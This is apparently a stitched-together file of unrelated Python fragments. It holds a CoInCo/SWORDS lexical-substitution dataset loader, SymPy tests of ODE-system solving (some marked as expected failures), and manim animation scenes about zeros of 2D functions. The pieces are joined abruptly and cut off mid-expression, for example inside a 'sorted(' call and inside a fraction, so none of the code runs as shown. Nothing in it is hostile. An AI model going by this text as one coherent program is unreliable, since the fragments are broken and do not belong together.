region_tokens_offsets = tokens_offsets(region, region_tokens)
# NOTE: CoInCo sometimes has an extra token at the end which we can safely ignore
assert None not in region_tokens_offsets[:-1]
# Add context
cid = LexSubDataset.context_id(LexSubDataset.create_context(context_str))
extra = {
'legacy_id': f'{masc_fn}:{masc_region_id}',
'split': unofficial_split,
'masc': {
'document_fn': masc_fn,
'region_id': masc_region_id,
'region_bounds': region_bounds,
'context_bounds': context_bounds,
},
'coinco': {
'split': coinco_split,
'xml_index': context_index,
'xml_attrs': context_el.attrs,
'precontext': context_el.find('precontext').text.strip(),
'targetsentence': context_el.find('targetsentence').text.strip(),
'postcontext': context_el.find('postcontext').text.strip(),
}
}
if d.has_context(cid):
extra = d.get_context(cid)['extra'] + [extra]
else:
extra = [extra]
cid = d.add_context(context_str, extra=extra, update_ok=True)
for target_index, (target_el, target_offset) in enumerate(zip(region_tokens_els, region_tokens_offsets)):
substitute_els = target_el.find_all('subst')
# Skip if target token not in context (due to handful of tokenization errors in CoInCo)
if target_offset is None:
assert len(substitute_els) == 0
continue
# Skip if target not POS-tagged in MASC
target_pos_masc = target_el.attrs['posMASC'].strip()
if target_pos_masc == 'XXX':
assert len(substitute_els) == 0
continue
else:
# TODO: Is this problematic? I.e., posMASC='XXX' implies no labels collected
assert len(substitute_els) > 0
target_pos = PTB_POS_TO_POS[target_pos_masc]
# Skip if problematic
if skip_problematic and target_el.attrs['problematic'].strip().lower() == 'yes':
continue
# Check split just to be safe
coinco_id = int(target_el.attrs['id'])
if coinco_split == 'dev':
assert coinco_id in _COINCO_DEV_IDS
else:
assert coinco_id in _COINCO_TEST_IDS
# Add target
target_str = target_el.attrs['wordform'].strip()
context_offset = region_offset_in_context + target_offset
if repair_context:
document_offset = region_bounds[0] + target_offset
assert masc_txt[document_offset:document_offset+len(target_str)].lower() == target_str.lower()
else:
document_offset = None
tid = LexSubDataset.target_id(LexSubDataset.create_target(cid, target_str, context_offset, pos=target_pos))
extra = {
'legacy_id': target_el.attrs['id'],
'masc': {
'document_offset': document_offset,
},
'coinco': {
'xml_index': target_index,
'xml_attrs': target_el.attrs
}
}
if d.has_target(tid):
extra = d.get_target(tid)['extra'] + [extra]
else:
extra = [extra]
tid = d.add_target(cid, target_str, context_offset, pos=target_pos, extra=extra, update_ok=True)
for substitute_index, substitute_el in enumerate(substitute_els):
# Add substitute
substitute_str = substitute_el.attrs['lemma'].strip()
num_votes = int(substitute_el.attrs['freq'])
sid = LexSubDataset.substitute_id(LexSubDataset.create_substitute(tid, substitute_str))
extra = {
'legacy_id': substitute_index,
'coinco': {
'xml_index': substitute_index,
'xml_attrs': substitute_el.attrs
}
}
if d.has_substitute(sid):
labels = d.get_substitute_labels(sid)
assert all([l == Label.TRUE_IMPLICIT for l in labels])
num_votes += len(labels)
extra = d.get_substitute(sid)['extra'] + [extra]
else:
extra = [extra]
labels = [Label.TRUE_IMPLICIT] * num_votes
sid = d.add_substitute(tid, substitute_str, labels, extra=extra, update_ok=True)
if include_negatives:
tid_to_sids = defaultdict(list)
for sid in d.all_substitute_ids():
tid_to_sids[d.get_substitute(sid)['target_id']].append(sid)
for tid in d.all_target_ids():
target = d.get_target(tid)
coinco_id = int(target['extra'][-1]['coinco']['xml_attrs']['id'])
candidates = _COINCO_ID_TO_MELAMUD_CANDIDATES.get(coinco_id, [])
substitutes = set([d.get_substitute(sid)['substitute'].lower() for sid in tid_to_sids.get(tid, [])])
for c in candidates:
if c.lower() not in substitutes:
sid = LexSubDataset.substitute_id(LexSubDataset.create_substitute(tid, c))
if d.has_substitute(sid):
labels = d.get_substitute_labels(sid)
assert all([l == Label.FALSE_IMPLICIT for l in labels])
else:
d.add_substitute(tid, c, [Label.FALSE_IMPLICIT], extra={'source': 'melamud'})
return d
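The loop above expands each CoInCo `freq` attribute into one implicit-positive label per annotator vote, merging with any labels already recorded for the same substitute id (`num_votes += len(labels)`). A minimal stand-alone sketch of that aggregation — the `Label` enum and helper name here are hypothetical stand-ins for the real ones:

```python
from enum import Enum


class Label(Enum):
    # Hypothetical stand-in for the Label enum assumed by the loader above
    TRUE_IMPLICIT = 1
    FALSE_IMPLICIT = 2


def votes_to_labels(num_votes, existing_labels=()):
    """Expand a vote count into one TRUE_IMPLICIT label per annotator vote,
    merging with labels already stored for the same substitute id."""
    # Mirrors the assertion in the loader: previously stored labels for a
    # re-encountered substitute must all be implicit positives.
    assert all(l == Label.TRUE_IMPLICIT for l in existing_labels)
    return [Label.TRUE_IMPLICIT] * (num_votes + len(existing_labels))
```

With `freq=3` and no prior labels this yields three `TRUE_IMPLICIT` entries; re-encountering the substitute adds the new votes on top of the stored ones.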
def swords(
split='test',
amt_csv_assets=[],
deny_list_assets=[],
strict_num_labels=None,
ensure_unique_substitute_labelers=False,
skip_control=True):
if split not in ['dev', 'test', 'train', 'valid']:
raise ValueError()
if ensure_unique_substitute_labelers:
# TODO
raise NotImplementedError()
assert len(amt_csv_assets) == len(set(amt_csv_assets))
assert len(deny_list_assets) == len(set(deny_list_assets))
# Create deny lists
worker_deny_list = set()
row_deny_list = set()
substitute_deny_list = set()
for deny_list_tag in deny_list_assets:
if isinstance(deny_list_tag, tuple):
text = file_from_bundle(ASSETS[deny_list_tag[0]]['fp'], deny_list_tag[1]).decode('utf-8')
lines = text.strip().splitlines()
else:
with open(ASSETS[deny_list_tag]['fp'], 'r') as f:
lines = f.read().strip().splitlines()
for l in lines:
ids = l.split()
assert len(ids) in [1, 2, 3]
worker_id = ids[0]
assert worker_id.startswith('A')
if len(ids) == 1:
worker_deny_list.add(worker_id)
else:
hit_id = ids[1]
assert len(hit_id) == 30
if len(ids) == 2:
row_deny_list.add((worker_id, hit_id))
else:
substitute_deny_list.add((worker_id, hit_id, int(ids[2])))
# Create dataset
coinco_d = coinco(split=split, repair_context=True)
# Parse AMT CSVs
d = LexSubDataset(substitutes_lemmatized=True)
row_ids_encountered = set()
num_labeled = 0
num_unlabeled = 0
for csv_tag in amt_csv_assets:
if isinstance(csv_tag, tuple):
text = file_from_bundle(ASSETS[csv_tag[0]]['fp'], csv_tag[1]).decode('utf-8')
reader = csv.DictReader(StringIO(text))
else:
with open(ASSETS[csv_tag]['fp'], 'r') as f:
reader = csv.DictReader(f)
for row in reader:
# Skip row if needed
worker_id = row['WorkerId'].strip()
row_id = (worker_id, row['HITId'].strip())
assert row_id not in row_ids_encountered
row_ids_encountered.add(row_id)
if worker_id in worker_deny_list:
continue
if row_id in row_deny_list:
continue
# Filter out buggy contexts from the first CSV tag
if '1109_0_300_results.csv' in csv_tag[-1] and (row['Input.s_left'] + row['Input.w'] + row['Input.s_right']) != row['Input.s']:
continue
# Extract target-level info
cid = row['Input.id']
if not coinco_d.has_context(cid):
continue
tid = row['Input.target_id']
assert coinco_d.has_target(tid)
assert row['Input.w'] == coinco_d.get_target(tid)['target']
#feedback = row['Answer.feedback']
# Extract substitute-level info
i = -1
while f'Input.wprime_id_{i+1}' in row:
i += 1
# Skip substitute if specified
substitute_id = row_id + (i,)
if substitute_id in substitute_deny_list:
continue
# Get substitute
maybe_sid = row[f'Input.wprime_id_{i}']
substitute_str = row[f'Input.wprime_{i}']
assert substitute_str.strip() == substitute_str
if len(substitute_str) == 0:
continue
sid = LexSubDataset.substitute_id(LexSubDataset.create_substitute(tid, substitute_str))
if sid != maybe_sid:
assert len(maybe_sid) != 42
source = row[f'Input.source_{i}'].strip()
if skip_control and source in ['same', 'rand']:
continue
# TODO: Restore time zone to PST
assert ' PST' in row['CreationTime']
hit_creation_time = int(datetime.strptime(row['CreationTime'].replace(' PST', ''), '%a %b %d %H:%M:%S %Y').timestamp())
# Get label
labels = [row[f'Answer.candidate{i}-{l}.on'] for l in ['abstain', 'bad', 'good']]
assert all([l in ['false', 'true'] for l in labels])
num_true = labels.count('true')
if num_true == 0:
num_unlabeled += 1
continue
elif num_true > 1:
raise Exception()
label = [Label.UNSURE, Label.FALSE, Label.TRUE][labels.index('true')]
num_labeled += 1
# Add context to dataset
if not d.has_context(cid):
context = coinco_d.get_context(cid)
_cid = d.add_context(context['context'], extra=context.get('extra'))
assert _cid == cid
# Add target to dataset
if not d.has_target(tid):
target = coinco_d.get_target(tid)
_tid = d.add_target(cid, target['target'], target['offset'], pos=target['pos'], extra=target.get('extra'))
assert _tid == tid
# Add substitute to dataset
extra = {
'substitute_source': source,
'label_source': substitute_id,
'hit_creation_time': hit_creation_time,
}
if coinco_d.has_substitute(sid):
extra['coinco'] = coinco_d.get_substitute(sid)['extra']
extra['coinco_labels'] = [l.name for l in coinco_d.get_substitute_labels(sid)]
if d.has_substitute(sid):
# Update substitute
labels = d.get_substitute_labels(sid) + [label]
extra = d.get_substitute(sid)['extra'] + [extra]
else:
# Create substitute
labels = [label]
extra = [extra]
assert len(extra) == len(labels)
_sid = d.add_substitute(tid, substitute_str, labels, extra=extra, update_ok=True)
assert _sid == sid
# Warn
if num_unlabeled > 0:
warnings.warn(f'{num_unlabeled} / {num_unlabeled + num_labeled} substitutes were unlabeled')
# Filter substitutes down to N labels
if strict_num_labels is not None:
d_strict = LexSubDataset(substitutes_lemmatized=True)
for sid in d.all_substitute_ids():
substitute = d.get_substitute(sid)
labels = d.get_substitute_labels(sid)
# Skip if we have less than N
if len(labels) < strict_num_labels:
continue
# Grab the most recent N labels if we have more than N
extra = substitute['extra']
if len(labels) > strict_num_labels:
assert len(labels) == len(extra)
labels_and_extra = list(zip(labels, extra))
labels_and_extra = sorted(labels_and_extra,
assert [ds.lhs for ds in dsolve_sol] == [f(x), g(x)]
assert [ds.rhs.equals(ss.rhs) for ds, ss in zip(dsolve_sol, sol)]
assert checksysodesol(eqs, sol) == (True, [0, 0]) # XFAIL
@XFAIL
def test_linear_2eq_order1_type6_path2():
# This is the reverse of the equations above and should also be handled by
# type6.
eqs = [
Eq(diff(g(x), x), 2 * (1 + 2 / x) * g(x) + 2 * (x - 1 / x) * f(x)),
Eq(diff(f(x), x), g(x) + x * f(x)),
]
# This solution is currently returned but is incorrect:
sol = [
Eq(
g(x),
C1 * exp(-2 * Integral(1 / x, x))
+ 2
* (
C1
+ Integral(
-C2 * exp(-2 * Integral(1 / x, x)) * exp(Integral(-2 * x - 1, x)), x
)
)
* exp(-Integral(-2 * x - 1, x)),
),
Eq(
f(x),
(
C1
+ Integral(
-C2 * exp(-2 * Integral(1 / x, x)) * exp(Integral(-2 * x - 1, x)), x
)
)
* exp(-Integral(-2 * x - 1, x)),
),
]
dsolve_sol = dsolve(eqs)
# Comparing solutions with == doesn't work in this case...
assert [ds.lhs for ds in dsolve_sol] == [g(x), f(x)]
assert [ds.rhs.equals(ss.rhs) for ds, ss in zip(dsolve_sol, sol)]
assert checksysodesol(eqs, sol) == (True, [0, 0]) # XFAIL
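The `@XFAIL` marker on the tests above tags cases that are expected to fail until the underlying solver bug is fixed. A minimal sketch of such a decorator — hypothetical, the real marker comes from the test framework:

```python
import functools


def xfail(f):
    """Expected-failure decorator sketch: a raising test counts as the
    expected outcome, while a passing test is flagged for attention."""
    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        try:
            f(*args, **kwargs)
        except Exception:
            return "expected failure"
        return "unexpectedly passed"
    return wrapper
```

An "unexpectedly passed" result is the signal to remove the marker once the solver is repaired.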
def test_nth_euler_imroot():
eq = x ** 2 * f(x).diff(x, 2) + x * f(x).diff(x) + 4 * f(x) - 1 / x
sol = Eq(f(x), C1 * sin(2 * log(x)) + C2 * cos(2 * log(x)) + 1 / (5 * x))
dsolve_sol = dsolve(
eq, hint="nth_linear_euler_eq_nonhomogeneous_variation_of_parameters"
)
assert dsolve_sol == sol
assert checkodesol(eq, sol, order=2, solve_for_func=False)[0]
def test_constant_coeff_circular_atan2():
eq = f(x).diff(x, x) + y * f(x)
sol = Eq(f(x), C1 * exp(-x * sqrt(-y)) + C2 * exp(x * sqrt(-y)))
assert dsolve(eq) == sol
assert checkodesol(eq, sol, order=2, solve_for_func=False)[0]
@XFAIL
def test_linear_2eq_order2_type1_fail1():
eqs = [Eq(f(x).diff(x, 2), 2 * f(x) + g(x)), Eq(g(x).diff(x, 2), -f(x))]
# This is the returned solution but it isn't correct:
sol = [
Eq(
f(x),
2 * C1 * (x + 2) * exp(x)
+ 2 * C2 * (x + 2) * exp(-x)
+ 2 * C3 * x * exp(x)
+ 2 * C4 * x * exp(-x),
),
Eq(
g(x),
-2 * C1 * x * exp(x)
- 2 * C2 * x * exp(-x)
+ C3 * (-2 * x + 4) * exp(x)
+ C4 * (-2 * x - 4) * exp(-x),
),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
@XFAIL
def test_linear_2eq_order2_type1_fail2():
eqs = [Eq(f(x).diff(x, 2), 0), Eq(g(x).diff(x, 2), f(x))]
sol = [
Eq(f(x), C1 + C2 * x),
Eq(g(x), C4 + C3 * x + C2 * x ** 3 / 6 + C1 * x ** 2 / 2),
]
assert dsolve(eqs) == sol # UnboundLocalError
assert checksysodesol(eqs, sol) == (True, [0, 0])
def test_linear_2eq_order2_type1():
eqs = [Eq(f(x).diff(x, 2), 2 * f(x)), Eq(g(x).diff(x, 2), -f(x) + 2 * g(x))]
sol = [
Eq(
f(x),
2 * sqrt(2) * C1 * exp(sqrt(2) * x) + 2 * sqrt(2) * C2 * exp(-sqrt(2) * x),
),
Eq(
g(x),
-C1 * x * exp(sqrt(2) * x)
+ C2 * x * exp(-sqrt(2) * x)
+ C3 * exp(sqrt(2) * x)
+ C4 * exp(-sqrt(2) * x),
),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
eqs = [Eq(f(x).diff(x, 2), 2 * f(x) + g(x)), Eq(g(x).diff(x, 2), +2 * g(x))]
sol = [
Eq(
f(x),
C1 * x * exp(sqrt(2) * x)
- C2 * x * exp(-sqrt(2) * x)
+ C3 * exp(sqrt(2) * x)
+ C4 * exp(-sqrt(2) * x),
),
Eq(
g(x),
2 * sqrt(2) * C1 * exp(sqrt(2) * x) + 2 * sqrt(2) * C2 * exp(-sqrt(2) * x),
),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
eqs = [Eq(f(x).diff(x, 2), f(x)), Eq(g(x).diff(x, 2), f(x))]
sol = [
Eq(f(x), C1 * exp(x) + C2 * exp(-x)),
Eq(g(x), C1 * exp(x) + C2 * exp(-x) - C3 * x - C4),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
eqs = [Eq(f(x).diff(x, 2), f(x) + g(x)), Eq(g(x).diff(x, 2), -f(x) - g(x))]
sol = [
Eq(f(x), C1 * x ** 3 + C2 * x ** 2 + C3 * x + C4),
Eq(g(x), -C1 * x ** 3 + 6 * C1 * x - C2 * x ** 2 + 2 * C2 - C3 * x - C4),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
def test_linear_2eq_order2_type2():
eqs = [Eq(f(x).diff(x, 2), f(x) + g(x) + 1), Eq(g(x).diff(x, 2), f(x) + g(x) + 1)]
sol = [
Eq(f(x), C1 * exp(sqrt(2) * x) + C2 * exp(-sqrt(2) * x) + C3 * x + C4 - S.Half),
Eq(g(x), C1 * exp(sqrt(2) * x) + C2 * exp(-sqrt(2) * x) - C3 * x - C4 - S.Half),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
eqs = [Eq(f(x).diff(x, 2), f(x) + g(x) + 1), Eq(g(x).diff(x, 2), -f(x) - g(x) + 1)]
sol = [
Eq(f(x), C1 * x ** 3 + C2 * x ** 2 + C3 * x + C4 + x ** 4 / 12 + x ** 2 / 2),
Eq(
g(x),
-C1 * x ** 3
+ 6 * C1 * x
- C2 * x ** 2
+ 2 * C2
- C3 * x
- C4
- x ** 4 / 12
+ x ** 2 / 2,
),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
@XFAIL
def test_linear_2eq_order2_type4():
Ca, Cb, Ra, Rb = symbols("Ca, Cb, Ra, Rb")
eq = [
f(x).diff(x, 2) + 2 * f(x).diff(x) + f(x) + g(x) - 2 * exp(I * x),
g(x).diff(x, 2) + 2 * g(x).diff(x) + f(x) + g(x) - 2 * exp(I * x),
]
dsolve_sol = dsolve(eq)
# Solution returned with Ca, Ra etc symbols is clearly incorrect:
sol = [
Eq(
f(x),
C1
+ C2 * exp(2 * x)
+ C3 * exp(x * (1 + sqrt(3)))
+ C4 * exp(x * (-sqrt(3) + 1))
+ (I * Ca + Ra) * exp(I * x),
),
Eq(
g(x),
-C1
- 3 * C2 * exp(2 * x)
+ C3 * (-3 * sqrt(3) - 4 + (1 + sqrt(3)) ** 2) * exp(x * (1 + sqrt(3)))
+ C4 * (-4 + (-sqrt(3) + 1) ** 2 + 3 * sqrt(3)) * exp(x * (-sqrt(3) + 1))
+ (I * Cb + Rb) * exp(I * x),
),
]
assert dsolve_sol == sol
assert checksysodesol(eq, sol) == (True, [0, 0]) # Fails here
def test_linear_2eq_order2_type5():
eqs = [
Eq(f(x).diff(x, 2), 2 * (x * g(x).diff(x) - g(x))),
Eq(g(x).diff(x, 2), -2 * (x * f(x).diff(x) - f(x))),
]
sol = [
Eq(
f(x),
C3 * x
+ x * Integral((2 * C1 * cos(x ** 2) + 2 * C2 * sin(x ** 2)) / x ** 2, x),
),
Eq(
g(x),
C4 * x
+ x * Integral((-2 * C1 * sin(x ** 2) + 2 * C2 * cos(x ** 2)) / x ** 2, x),
),
]
assert dsolve(eqs) == sol
# FIXME: checksysodesol not working:
# assert checksysodesol(eqs, sol) == (True, [0, 0])
def test_linear_2eq_order2_type8():
eqs = [
Eq(f(x).diff(x, 2), 2 / x * (x * g(x).diff(x) - g(x))),
Eq(g(x).diff(x, 2), -2 / x * (x * f(x).diff(x) - f(x))),
]
# FIXME: This is what is returned but it does not seem correct:
sol = [
Eq(
f(x),
C3 * x
+ x
* Integral(
(-C1 * cos(Integral(-2, x)) - C2 * sin(Integral(-2, x))) / x ** 2, x
),
),
Eq(
g(x),
C4 * x
+ x
* Integral(
(-C1 * sin(Integral(-2, x)) + C2 * cos(Integral(-2, x))) / x **
full_rect.set_stroke(WHITE, 0)
full_rect.color_using_background_image(self.background_image_file)
title = TextMobject("Output Space")
title.scale(1.5)
title.to_edge(UP, buff = MED_SMALL_BUFF)
title.set_stroke(BLACK, 1)
# self.add_foreground_mobjects(title)
plane = NumberPlane()
plane.fade(0.5)
plane.axes.set_stroke(WHITE, 3)
# plane.add(BackgroundRectangle(title))
self.add(plane)
dots = VGroup()
step = self.dot_spacing
for x in np.arange(-FRAME_X_RADIUS, FRAME_X_RADIUS+step, step):
for y in np.arange(-FRAME_Y_RADIUS, FRAME_Y_RADIUS+step, step):
dot = Dot(color = WHITE)
dot.color_using_background_image(self.background_image_file)
dot.move_to(x*RIGHT + y*UP)
dots.add(dot)
random.shuffle(dots.submobjects)
m = 3  # exponential factor
n = 1
dot_groups = VGroup()
while n <= len(dots):
dot_groups.add(dots[n-1:m*n-1])
n *= m
self.play(LaggedStart(
LaggedStart, dot_groups,
lambda dg : (GrowFromCenter, dg),
run_time = 8,
lag_ratio = 0.2,
))
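The `while n <= len(dots)` loop above splits the shuffled dots into exponentially growing batches (sizes 2, 6, 18, ... for `m = 3`), so early groups pop in quickly and later ones arrive in bulk. The slicing can be sketched in isolation — the helper name is illustrative, not part of the scene code:

```python
def exponential_batches(items, m=3):
    """Split items into slices [n-1, m*n-1) for n = 1, m, m**2, ...,
    mirroring the dot_groups construction above; batch k holds
    (m - 1) * m**k elements until the list runs out."""
    batches, n = [], 1
    while n <= len(items):
        batches.append(items[n - 1:m * n - 1])
        n *= m
    return batches
```

Because each slice starts where the previous one ended, concatenating the batches recovers the original list in order.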
class DotsHoppingToColor(InputOutputScene):
CONFIG = {
"dot_radius" : 0.05,
"dot_density" : 0.25,
}
def construct(self):
input_coloring, output_coloring = self.get_colorings()
input_plane, output_plane = self.get_planes()
v_line = self.get_v_line()
dots = self.get_dots(input_plane, output_plane)
right_half_block = Rectangle(
height = FRAME_HEIGHT,
width = FRAME_X_RADIUS - SMALL_BUFF,
stroke_width = 0,
fill_color = BLACK,
fill_opacity = 0.8,
)
right_half_block.to_edge(RIGHT, buff = 0)
#Introduce parts
self.add(input_plane, output_plane, v_line)
self.play(
FadeIn(output_coloring),
Animation(output_plane),
output_plane.white_parts.set_color, BLACK,
output_plane.lines_to_fade.set_stroke, {"width" : 0},
)
self.wait()
self.play(LaggedStart(GrowFromCenter, dots, run_time = 3))
self.wait()
#Hop over and back
self.play(LaggedStart(
MoveToTarget, dots,
path_arc = -TAU/4,
run_time = 3,
))
self.wait()
self.play(LaggedStart(
ApplyMethod, dots,
lambda d : (d.set_fill, d.target_color),
))
self.wait()
self.play(LaggedStart(
ApplyMethod, dots,
lambda d : (d.move_to, d.original_position),
path_arc = TAU/4,
run_time = 3,
))
self.wait()
self.play(
FadeIn(input_coloring),
Animation(input_plane),
input_plane.white_parts.set_color, BLACK,
input_plane.lines_to_fade.set_stroke, {"width" : 0},
FadeOut(dots),
)
self.wait()
#Cover output half
right_half_block.save_state()
right_half_block.next_to(FRAME_X_RADIUS*RIGHT, RIGHT)
self.play(right_half_block.restore)
self.wait()
# Show yellow points
inspector = DashedLine(
ORIGIN, TAU*UP,
dashed_segment_length = TAU/24,
fill_opacity = 0,
stroke_width = 3,
stroke_color = WHITE,
)
inspector.add(*inspector.copy().set_color(BLACK).shift((TAU/24)*UP))
inspector.apply_complex_function(np.exp)
inspector.scale(0.15)
inspector_image = inspector.copy()
def update_inspector_image(inspector_image):
inspector_image.move_to(self.point_function(inspector.get_center()))
inspector_image_update_anim = UpdateFromFunc(
inspector_image, update_inspector_image
)
pink_points_label = TextMobject("Pink points")
pink_points_label.scale(0.7)
pink_points_label.set_color(BLACK)
self.play(
inspector.move_to, input_plane.coords_to_point(-2.75, 2.75),
inspector.set_stroke, {"width" : 2},
)
pink_points_label.next_to(inspector, RIGHT)
self.play(
Rotating(
inspector, about_point = inspector.get_center(),
rate_func = smooth,
run_time = 2,
),
Write(pink_points_label)
)
self.wait()
self.play(right_half_block.next_to, FRAME_X_RADIUS*RIGHT, RIGHT)
inspector_image_update_anim.update(0)
self.play(ReplacementTransform(
inspector.copy(), inspector_image,
path_arc = -TAU/4,
))
self.play(
ApplyMethod(
inspector.move_to,
input_plane.coords_to_point(-2, 0),
path_arc = -TAU/8,
run_time = 3,
),
inspector_image_update_anim
)
self.play(
ApplyMethod(
inspector.move_to,
input_plane.coords_to_point(-2.75, 2.75),
path_arc = TAU/8,
run_time = 3,
),
inspector_image_update_anim
)
self.play(FadeOut(pink_points_label))
# Show black zero
zeros = tuple(it.starmap(input_plane.coords_to_point, [
(-2., -1), (1, 1), (2, -2),
]))
for x in range(2):
for zero in zeros:
path = ParametricFunction(
bezier([
inspector.get_center(),
input_plane.coords_to_point(0, 0),
zero
]),
t_min = 0, t_max = 1
)
self.play(
MoveAlongPath(inspector, path, run_time = 2),
inspector_image_update_anim,
)
self.wait()
self.play(FadeOut(VGroup(inspector, inspector_image)))
# Show all dots and slowly fade them out
for dot in dots:
dot.scale(1.5)
self.play(
FadeOut(input_coloring),
input_plane.white_parts.set_color, WHITE,
LaggedStart(GrowFromCenter, dots)
)
self.wait()
random.shuffle(dots.submobjects)
self.play(LaggedStart(
FadeOut, dots,
lag_ratio = 0.05,
run_time = 10,
))
# Ask about whether a region contains a zero
question = TextMobject("Does this region \\\\ contain a zero?")
question.add_background_rectangle(opacity = 1)
question.next_to(input_plane.label, DOWN)
square = Square()
square.match_background_image_file(input_coloring)
square.move_to(input_plane)
self.play(ShowCreation(square), Write(question))
self.wait()
quads = [
(0, 0.5, 6, 6.25),
(1, 1, 0.5, 2),
(-1, -1, 3, 4.5),
(0, 1.25, 5, 1.7),
(-2, -1, 1, 1),
]
for x, y, width, height in quads:
self.play(
square.stretch_to_fit_width, width,
square.stretch_to_fit_height, height,
square.move_to, input_plane.coords_to_point(x, y)
)
self.wait()
class SoWeFoundTheZeros(AltTeacherStudentsScene):
def construct(self):
self.student_says(
"Aha! So we \\\\ found the solutions!",
target_mode = "hooray",
student_index = 2,
bubble_kwargs = {"direction" : LEFT},
)
self.wait()
self.teacher_says(
"Er...only \\\\ kind of",
target_mode = "hesitant"
)
self.wait(3)
class Rearrange2DEquation(AltTeacherStudentsScene):
def construct(self):
f_tex, g_tex, h_tex = [
"%s(\\text{2d point})"%char
for char in ("f", "g", "h")
]
zero_tex = "\\vec{\\textbf{0}}"
equations = VGroup(
TexMobject(g_tex, "", "=", h_tex, ""),
TexMobject(g_tex, "-", h_tex, "=", zero_tex),
)
equations.move_to(self.hold_up_spot, DOWN)
equations.shift_onto_screen()
brace = Brace(equations[1], UP)
zero_eq = brace.get_tex("%s = %s"%(f_tex, zero_tex))
for equation in equations:
equation.set_color_by_tex(g_tex, BLUE)
equation.set_color_by_tex(h_tex, YELLOW)
equation.sort_submobjects_alphabetically()
self.teacher_holds_up(equations[0])
self.change_all_student_modes("pondering")
self.play(Transform(
*equations,
run_time = 1.5,
path_arc = TAU/2
))
self.play(
Succession(
GrowFromCenter(brace),
Write(zero_eq, run_time = 1)
),
self.get_student_changes(*["happy"]*3)
)
self.play(*[
ApplyMethod(pi.change, "thinking", self.screen)
for pi in self.pi_creatures
])
self.wait(3)
class SearchForZerosInInputSpace(ColorMappedObjectsScene):
CONFIG = {
"func" : example_plane_func,
}
def construct(self):
ColorMappedObjectsScene.construct(self)
title = TextMobject("Input space")
title.scale(2)
title.to_edge(UP)
title.set_stroke(BLACK, 1)
title.add_background_rectangle()
plane = NumberPlane()
plane.fade(0.5)
plane.axes.set_stroke(WHITE, 3)
self.add(plane, title)
looking_glass = Circle()
looking_glass.set_stroke(WHITE, 3)
looking_glass.set_fill(WHITE, 0.6)
looking_glass.color_using_background_image(self.background_image_file)
question = TextMobject("Which points go to 0?")
question.next_to(looking_glass, DOWN)
question.add_background_rectangle()
mover = VGroup(looking_glass, question)
mover.move_to(4*LEFT + UP)
self.play(FadeIn(mover))
points = [4*RIGHT+UP, 2*RIGHT+2*DOWN, 2*LEFT+2*DOWN, 3*RIGHT+2.5*DOWN]
for point in points:
self.play(mover.move_to, point, run_time = 1.5)
self.wait()
class OneDRegionBoundary(Scene):
CONFIG = {
"graph_color" : BLUE,
"region_rect_height" : 0.1,
}
def construct(self):
x0 = self.x0 = 3
x1 = self.x1 = 6
fx0 = self.fx0 = -2
fx1 = self.fx1 = 2
axes = self.axes = Axes(
x_min = -1, x_max = 10,
y_min = -3, y_max = 3,
)
axes.center()
axes.set_stroke(width = 2)
input_word = TextMobject("Input")
input_word.next_to(axes.x_axis, UP, SMALL_BUFF, RIGHT)
output_word = TextMobject("Output")
output_word.next_to(axes.y_axis, UP)
axes.add(input_word, output_word)
self.add(axes)
graph = self.get_graph_part(1, 1)
alt_graphs = [
self.get_graph_part(*points)
for points in [
(-1, -2),
(-1, -1, -1),
(1, 1, 1),
(-0.75, 0, 1.75),
(-3, -2, -1),
]
]
#Region and boundary
line = Line(axes.coords_to_point(x0, 0), axes.coords_to_point(x1, 0))
region = Rectangle(
stroke_width = 0,
fill_color = YELLOW,
fill_opacity = 0.5,
height = self.region_rect_height
)
region.match_width(line, stretch = True)
region.move_to(line)
region_words = TextMobject("Input region")
region_words.set_width(0.8*region.get_width())
region_words.next_to(region, UP)
x0_arrow, x1_arrow = arrows = VGroup(*[
Arrow(
axes.coords_to_point(x, 0),
axes.coords_to_point(x, fx),
color = color,
buff = 0
)
for x, fx, color in [(x0, fx0, RED), (x1, fx1, GREEN)]
])
minus = TexMobject("-")
minus.match_color(x0_arrow)
minus.next_to(x0_arrow, UP)
plus = TexMobject("+")
plus.match_color(x1_arrow)
plus.next_to(x1_arrow, DOWN)
signs = VGroup(plus, minus)
self.play(
GrowFromCenter(region),
FadeIn(region_words)
)
self.wait()
self.play(*it.chain(
list(map(GrowArrow, arrows)),
list(map(Write, signs))
))
self.wait()
self.play(
ShowCreation(graph),
FadeOut(region_words),
)
self.wait()
for alt_graph in alt_graphs + alt_graphs:
self.play(Transform(graph, alt_graph, path_arc = 0.1*TAU))
self.wait()
###
def get_graph_part(self, *interim_values):
result = VMobject()
result.set_stroke(self.graph_color, 3)
result.set_fill(opacity = 0)
values = [self.fx0] + list(interim_values) + [self.fx1]
result.set_points_smoothly([
self.axes.coords_to_point(x, fx)
for x, fx in zip(
np.linspace(self.x0, self.x1, len(values)),
values
)
])
return result
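`get_graph_part` pairs each interim value with an evenly spaced x between `x0` and `x1` via `np.linspace` before smoothing a curve through the points. A stdlib sketch of that pairing step — the helper name is hypothetical, for illustration:

```python
def spaced_points(x0, x1, values):
    """Pair each value with an evenly spaced x in [x0, x1], a stdlib
    stand-in for the np.linspace call in get_graph_part above."""
    n = len(values)
    if n == 1:
        # Degenerate case: a single value sits at the left endpoint
        return [(x0, values[0])]
    step = (x1 - x0) / (n - 1)
    return [(x0 + i * step, v) for i, v in enumerate(values)]
```

For the scene's defaults (`x0=3`, `x1=6`) and three values, the interim value lands at the midpoint x = 4.5.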
class DirectionOfA2DFunctionAlongABoundary(InputOutputScene):
def construct(self):
colorings = self.get_colorings()
colorings.set_fill(opacity = 0.25)
input_plane, output_plane = planes = self.get_planes()
for plane in planes:
plane.lines_to_fade.set_stroke(width = 0)
v_line = self.get_v_line()
rect = Rectangle()
rect.set_stroke(WHITE, 5)
rect.set_fill(WHITE, 0)
line = Line(
input_plane.coords_to_point(-0.75, 2.5),
input_plane.coords_to_point(2.5, -1.5),
)
rect.replace(line, stretch = True)
rect.insert_n_anchor_points(50)
rect.match_background_image_file(colorings[0])
rect_image = rect.copy()
